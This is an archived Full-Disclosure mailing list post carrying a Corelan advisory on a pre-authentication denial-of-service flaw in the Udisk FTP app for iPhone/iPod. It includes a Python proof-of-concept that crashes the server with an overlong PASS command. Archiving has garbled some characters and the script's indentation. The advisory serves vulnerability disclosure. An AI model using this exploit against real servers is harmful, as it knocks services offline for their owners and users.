[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] CORELAN-10-003 - Udisk FTP Basic Edition Remote pre-auth DOS Advisory

Hello,

Just advising of a vulnerability in U-Disk FTP server (Basic Edition). Please 
see attached advisory for details.

Kind regards,

mr_me
                                          
_________________________________________________________________
Time for a new car? Sell your old one fast!
http://clk.atdmt.com/NMN/go/157637060/direct/01/
|------------------------------------------------------------------|
|                         __               __                      |
|   _________  ________  / /___ _____     / /____  ____ _____ ___  |
|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |
| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |
| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |
|                                                                  |
|                                       http://www.corelan.be:8800 |
|                                              security@xxxxxxxxxx |
|                                                                  |
|-------------------------------------------------[ EIP Hunters ]--|
|                                                                  |
|                 Vulnerability Disclosure Report                  |
|                                                                  |
|------------------------------------------------------------------|

Advisory : CORELAN-10-003
Disclosure date : 12th January 2010
Corelan reference : 
http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-003-udisk-v1-0-remote-dos/
0×00 : Vulnerability information
???????????

[*] Product : Apple Iphone/Ipod ? Udisk FTP basic edition Remote pre-auth DOS 
vulnerability
[*] Version : 1.0
[*] Vendor : http://6tags.com
[*] URL : http://6tags.com/n/index.php/iphone/udisk/intro
[*] Type of vulnerability : Remote DOS
[*] Risk rating : Medium
[*] Issue fixed in version : <not fixed>
[*] Vulnerability discovered by : mr_me
[*] Greetings to : corelanc0d3r, rick2600, ekse & MarkoT from Corelan Team

0×01 : Vendor description of software
????????????-
From the vendor website:

U.Disk is an easy used application, with stand FTP server build in. With this 
feature, you can upload or download thousands of files by on click. Just use 
Copy & Paste to access files. Like your real U-Disk.

0×02 : Vulnerability details
?????????-
Remote Denial of Service:

When the application is sent a password (PASS) command with characters of size 
2047 the application crashs. 
Remote code execution maybe possible. 

0×03 : Vendor communication
?????????
[*] 3rd January, 2010 : Vendor contacted
[*] 9th January 2010 : Vendor reminded of vulnerability
[*] 12th January 2010 : Public Disclosure

0×04 : Exploit/PoC
??????

#!/usr/bin/python

print "[+] Apple Iphone/Ipod ? Udisk FTP basic edition 0day Remote DOS exploit"

import socket
import sys

def Usage():
print ("Usage: ./udisk.py <serv_ip>\n")
print ("Example:./udisk.py 192.168.2.3\n")
if len(sys.argv) <> 2:
Usage()
sys.exit(1)
else:
hostname = sys.argv[1]
username = "anonymous"
passwd = "x41? * 2047
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 8080))
print "[+] Connecting to the target.."
except:
print ("[-] Connection error!")
sys.exit(1)
r=sock.recv(1024)
print "[+] Sending payload.."
sock.send("USER %s\r\n" %username)
sock.send("PASS %s\r\n" %passwd)
sock.send("PWD\r\n")
sock.close()
print "[+] Server is now DOS'ed ;)"
sys.exit(0);


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/